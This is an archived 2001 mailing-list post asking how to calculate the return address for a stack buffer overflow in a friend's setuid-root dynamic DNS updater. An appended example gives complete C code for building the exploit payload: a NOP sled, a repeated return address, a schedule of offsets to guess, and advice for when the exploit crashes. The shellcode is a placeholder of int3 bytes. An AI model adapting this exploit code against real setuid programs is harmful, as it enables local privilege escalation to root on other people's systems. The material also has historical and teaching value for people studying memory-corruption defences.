Hi folks, here I am again with a question on writing exploits! My problem is that in the last exploit I wrote, the buffer I overflowed was the first variable in the program, so it was not very difficult to guess the offset. Now I found a buffer overflow problem in a little program my friend wrote, a dynamic DNS entry updater (runs as setuid root). The variable is now no longer in first place.

In my last exploit I used the function sp() to get the stack pointer and wanted the user to enter the offset. Then I calculated the return address by subtracting the offset from the stack pointer. Generally the value 0 was OK for the offset and my exploit worked as I wanted it to. Can anybody tell me how I can guess the offset and how to calculate the return address if the variable is not the first one in the program?

Piece of code from an exploit:

    offset = atoi(argv[1]);
    esp = sp();            /* get stack pointer */
    ret = esp - offset;

Thanks,
sniper
sniperat_private
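Added example (my own code, not sniper's exploit or the friend's updater, neither of which is shown here): the usual answer to "which offset?" is to stop needing the exact one. Put a NOP sled in front of the shellcode and repeat the return address at every word slot after it, so the saved return address is overwritten no matter how many other locals the compiler placed between the buffer and the saved registers, and `ret = esp - offset` only has to land somewhere inside the sled. The offsets are then tried in the order 0, +sled/2, -sled/2, +sled, -sled, ... so that consecutive guesses overlap. Assumptions: 32-bit x86 target, no stack randomisation (as in 2001), a fixed-size overflow into a buffer that is not the first local; the 23-byte "shellcode" is a constructed placeholder of int3 bytes, and the addresses used in the comments and checks are made up.

```c
#include <stdio.h>
#include <string.h>
#include <stdint.h>

#define NOP  0x90   /* x86 one-byte nop used for the sled */
#define WORD 4      /* width of a saved return address on 32-bit x86 */

/* Stack pointer of the exploit process, the role of sp() in the post. A target
 * started with a similar environment gets a stack near the same address (no
 * stack randomisation assumed), so offset 0 is the natural first guess. */
static uintptr_t sp(void)
{
    uintptr_t p;
#if defined(__i386__)
    __asm__ volatile ("movl %%esp, %0" : "=r" (p));
#elif defined(__x86_64__)
    __asm__ volatile ("movq %%rsp, %0" : "=r" (p));
#else
    p = (uintptr_t)__builtin_frame_address(0);   /* fallback on other CPUs */
#endif
    return p;
}

/* Lay out [NOP sled][shellcode][ret ret ret ...] in buf; return the sled length
 * (0 if len is too small). ret is repeated at every word slot after the
 * shellcode, so the saved return address is overwritten whatever locals the
 * compiler put between the buffer and the frame's saved registers. align (0..3)
 * shifts the slots when the buffer start is not word-aligned relative to the
 * saved return address. ret is stored in host byte order (= target's on x86). */
size_t build_payload(unsigned char *buf, size_t len, uint32_t ret,
                     const unsigned char *sc, size_t sclen, size_t align)
{
    size_t sled, start, i;

    if (align >= WORD || len < sclen + 2 * WORD + align)
        return 0;
    memset(buf, NOP, len);                 /* gaps and leftovers become nops */
    sled = (len - sclen) / 2;              /* half the spare room is sled */
    memcpy(buf + sled, sc, sclen);
    start = sled + sclen;                  /* first word slot after shellcode */
    start = align + ((start - align + WORD - 1) / WORD) * WORD;
    for (i = start; i + WORD <= len; i += WORD)
        memcpy(buf + i, &ret, WORD);
    return sled;
}

/* k-th offset to try: 0, +s, -s, +2s, -2s, ... with s = sled/2. Consecutive
 * guesses lie closer together than the sled is long, so any true distance
 * esp - buf inside the scanned range puts ret in the sled for some k. */
long guess_offset(size_t k, size_t sled)
{
    long step = (long)(sled / 2), m = (long)((k + 1) / 2);
    return k == 0 ? 0 : (k % 2 ? m * step : -m * step);
}

/* Does ret = esp - offset fall inside the sled of a buffer at buf_addr?
 * Pure arithmetic on hypothetical addresses, to check the schedule offline. */
int lands_in_sled(uintptr_t esp, long offset, uintptr_t buf_addr, size_t sled)
{
    uintptr_t ret = esp - (uintptr_t)offset;   /* modular: -offset adds */
    return ret >= buf_addr && ret < buf_addr + sled;
}

/* Index of the first guess that lands, or -1 if none within max_tries. */
long first_landing_guess(uintptr_t esp, uintptr_t buf_addr, size_t sled,
                         size_t max_tries)
{
    size_t k;
    for (k = 0; k < max_tries; k++)
        if (lands_in_sled(esp, guess_offset(k, sled), buf_addr, sled))
            return (long)k;
    return -1;
}

/* Distance from a buffer that is NOT the first local to the saved return
 * address; whatever the compiler placed above buf adds to it. Build with -O0
 * for a layout like an unoptimised target's (locals may still be reordered). */
size_t distance_to_saved_ret(void)
{
    volatile int before = 1;
    volatile char buf[64];
    volatile int after = 2;
    uintptr_t saved = (uintptr_t)__builtin_frame_address(0) + sizeof(void *);
    buf[0] = (char)(before + after);
    return (size_t)(saved - (uintptr_t)buf);
}

int main(void)
{
    unsigned char sc[23], payload[256];    /* sizes chosen for the demo */
    uintptr_t esp = sp();
    size_t k, sled;

    memset(sc, 0xcc, sizeof sc);           /* constructed stand-in: int3s, not shellcode */
    sled = build_payload(payload, sizeof payload, (uint32_t)esp, sc, sizeof sc, 0);
    printf("esp=%#lx sled=%zu buf->saved ret=%zu bytes\n",
           (unsigned long)esp, sled, distance_to_saved_ret());
    for (k = 0; k < 7; k++)                /* offsets in the order to try them */
        printf("guess %zu: ret = esp - (%ld)\n", k, guess_offset(k, sled));
    return 0;
}
```

The payload size has to match how far the overflow reaches past the saved return address, which is the part that changes when the buffer is not the first local: the extra locals only move the slot that holds the saved return address, and the repeated ret covers all candidate slots at once. If the exploit exits with SIGSEGV instead of giving a shell, the usual causes are a misaligned slot (try align 1..3) or the buffer lying outside the scanned range (run through guess_offset for larger k). This whole approach relies on an executable stack at a predictable address; with stack randomisation, a non-executable stack or stack canaries it does not work as is.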
This archive was generated by hypermail 2b30 : Mon Jun 18 2001 - 09:53:57 PDT